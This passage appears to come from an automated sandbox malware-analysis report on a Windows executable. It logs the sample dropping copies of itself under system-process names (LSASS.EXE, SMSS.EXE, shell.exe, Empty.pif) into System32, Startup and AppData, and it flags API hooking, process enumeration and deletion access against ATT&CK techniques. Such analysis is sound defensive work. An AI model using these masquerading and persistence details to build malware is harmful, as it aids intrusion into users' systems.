4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46828 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46847 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46816 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46865 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46799 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46921 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46820 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46895 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46829 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46786 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46888 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46931 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46903 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46748 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46889 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46727 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46770 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46873 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46874 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46791 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46742 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46863 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46906 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46958 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46849 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46872 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46794 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46740 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46912 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46807 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46851 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46960 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46865 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46829 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46801 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46955 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46943 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46955 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46764 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46850 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46848 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE5DF0.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE466A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE466E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE5DF3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE5F75.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE5F79.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FileTimeToLocalFileTime\" with parameter bf9d537a69a4db01 & bf6ddc3d7aa4db01 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FileTimeToLocalFileTime\" with parameter 8dfe627561a4db01 & 8dceeb3872a4db01 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 30b587bd3c04ca01 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FileTimeToLocalFileTime\" with parameter 47a02e7561a4db01 & Gp (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"FileTimeToLocalFileTime\" with parameter cefebe286ba4db01 & cece47ec7ba4db01 (UID: 00000000-00005080)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005080)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-284", "type": 6, "relevance": 1, "name": "Opens a handle to the specified local process", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opens a process \"C:\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opens a process \"C:\\Windows\\System32\\taskhost.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opens a process \"C:\\Windows\\System32\\dwm.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opens a process \"C:\\Windows\\explorer.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opens a process \"C:\\Windows\\System32\\conhost.exe\" (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opens a process \"C:\\Windows\\D3_08.exe\" (UID: 00000000-00005080)", "origin": "API Call", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"CopyFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"LoadLibraryExW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateProcessW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"Process32NextW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"send@WS2_32.DLL\" in \"SERVICES.EXE\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateDirectoryA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateProcessA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"LoadLibraryA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CopyFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"LoadResource@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindResourceA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"WinExec@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"GetProcAddress@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"Process32FirstW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"OpenMutexA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\smss.exe\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n 